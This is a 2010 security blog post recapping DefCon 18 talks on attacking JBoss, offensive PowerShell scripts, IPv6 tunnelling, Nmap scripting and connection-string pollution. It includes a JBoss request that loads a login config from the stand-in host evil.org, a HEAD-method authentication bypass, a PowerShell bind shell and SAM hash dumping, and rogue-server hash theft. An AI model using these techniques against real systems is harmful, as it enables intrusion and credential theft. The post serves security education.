Archive for August, 2010

 

DefCon 18 – 2010

Aug 03, 2010 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]
[BinPack Tool – BinPack is a portable security environment for Windows.]

DefCon Talks:

I complied some of the talks that I found interesting during DefCon this year.  Happy Hacking!

Attacking JBoss (Tyler Krpata):
JBoss Application Server (or JBoss AS) is a free software/open-source Java EE-based application server. Because it is Java-based, the JBoss application server operates cross-platform: usable on any operating system that supports Java. JBoss AS was developed by JBoss, now a division of Red Hat. http://en.wikipedia.org/wiki/JBoss_application_server

JMX Console is a front end web interface to MBeans and installed by default with no security.
Below is the JMXConsole – Default Configuration:

<web-resource-collection>
<web-resource-name>HtmlAdaptor</web-resource-name>
<description>An example security config that only allows
users with the role JBossAdminto access the HTML JMX console web application</description>
<url-pattern>/*</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method></web-resource-collection>

Only GET and POST methods are tracked and authentication can be bypassed by using HEAD methods.

The Login module for JBoss is specified in the file: login-config.xml
It is possible by using your own login config by supplying your own xml file: http:// jbossserver:8080/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.security:service=XMLLoginConfig&methodIndex=5&arg0=http://evil.org/login-config.xml

Twiddle (RMIAdaptor Service)
JBoss provides a simple command line tool that allows for interaction with a remote JMX server instance. This tool is called twiddle (for twiddling bits via JMX) and is located in the bin directory of the distribution. Twiddle is a command execution tool, not a general command shell.

twiddle

Jboss 4 and lower attacks
-Metasploit MainDeployer Exploit
-Exploited jmx-console application
-Temp Server and WAR archive is created
-Over HTTP/BeanShell Deployer

Jboss 5.0.1 attacks
-Local File
–JBoss 5.x IS vulnerable to DeploymentFileRepository Exploit:
–Jmx-console/HtmlAdaptor?action=updateAttributes&name=jboss.admin%3Aservice%3DDeploymentFileRepository&BaseDir=.

Deployed Applications List can be viewed if the ?full parameter is changed from ?full=false to ?full=true.

http://files.tylerkrpata.com/Attacking%20JBoss.pdf

PowerShell (Rel1k)

Windows PowerShell is Microsoft’s task automation framework, consisting of a command-line shell and associated scripting language built on top of, and integrated with, the .NET Framework. PowerShell provides full access to COM and WMI, enabling administrators to perform administrative tasks on both local and remote Windows systems. – http://en.wikipedia.org/wiki/Windows_PowerShell

PowerShell is installed on all Windows 7/Server 2008 and almost impossible to remove.  Execution privileges on PowerShell executables do not fully work.

Rel1k from secmaniac.com, has released a bunch of PowerShell scripts and metasploit tools to pretty much get shell using PowerShell.  The scripts he has created are:

bind
The bind  will create a socket and listen for a connection and launch cmd.exe piped via the socket. Simply run it .\bind.ps1 to execute.

powerdump.ps1
Just run powerdump.ps1 and type “DumpHashes” in order to dump the SAM database from the system.

Createcmd.ps1
If you want to bypass execution restriction policies, simply take your code that you want to get passed and execute the createcmd.ps1 with the following syntax:
.\createcmd.ps1 psfiletogetencoded.ps1 | Out-File mycmd.bat ascii
This will create a .bat file that will drop you into a powershell environment with your variables pre-loaded

MetaSploit
Metasploit Modules Installation*** MSSQL_PAYLOAD ***The modified mssql_payload incorporates the new powershell attack vector by takinga Metasploit based executable and uploading it through MSSQL via hexadecimal format. It will then convert the hex based executable back to a binary through powershell.

http://www.secmaniac.com/july-2010/blackhat-and-defcon-poc-code-released/

IPv6

Internet Protocol version 6 (IPv6) is a version of the Internet Protocol that is designed to succeed IPv4, the first publically used implementation, which is still in dominant use currently[update]. It is an Internet Layer protocol for packet-switched internetworks. The main driving force for the redesign of Internet Protocol is the foreseeable IPv4 address exhaustion. IPv6 is specified by the Internet Engineering Task Force (IETF) and described in Internet standard document RFC 2460, which was published in December 1998. – http://en.wikipedia.org/wiki/IPv6

IPv4 has 4 billion addresses and supposedly 2 years left to allocate IPs on IPv4.  As a replacement, IPv6 has 256 billion billion billion billion addresses and is coming down quick.  The gist of this talk was that attacks are not monitored and attackers could use IPv6 to tunnel their shells back out.

Pentester tools:
Free IPv4 to IPv6 tunnels
-Gogo6.com
-Sixxs.net
-Tunnelbroker.com
Tools
-THC-IPv6 – scanners, spoofing, redirect, DoS tools

Nmap and NSE (Fyodor)

Scriptable interaction with the target – using Nmap Scripting Engine (NSE) and Lua programming language customized queries can be made Nmap Scripting Engine.  http://nmap.org/nsedoc/

They are so easy, a caveman can do it…

description = [[
Finds a webcam.
]]

categories = {“safe”, “discovery”}

require(“http”)

function portrule(host, port)
return port.number == 80
end

function action(host, port)
local response

response = http.get(host, port, “/cam.jpg”)
if response.status and response.status ~= 404
and response.header[“server”]
and string.match(response.header[“server”], “^thttpd/”) then
return “Found webcam.”
end
end

Connection String Parameter Pollution Attacks (Alonso-Palazón)

Connection strings are used to connect applications to database engines. The
syntax used on these strings depends on the database engine to be connected to and on
the provider or driver used by the programmer to establish the connection.
One way or another, the programmer must specify the server and port to connect
to, the database name, authentication credentials, and some connection configuration
parameters, such as timeout, alternative databases, communication protocol or
encryption options.  (Alonso-Palazón)

You can abuse this by adding a semi-colon (;) in the username and password fields and adding
different connection string parameters.  Here is an example of this attack:

CSPP Attack 1: Hash stealing
1.‐ Run a Rogue Server on an accessibl IP address:
Rogue_Server
2.‐ Activate a sniffer to catch the login process
Cain/Wireshark
3.‐ Duplicate Data Source parameter
Data_Source=Rogue_Server
4.‐ ForceWindows Integrated Authentication
Integrated Security=true

http://www.informatica64.com

Teensy (IronGeek)

This pretty much says it all: http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle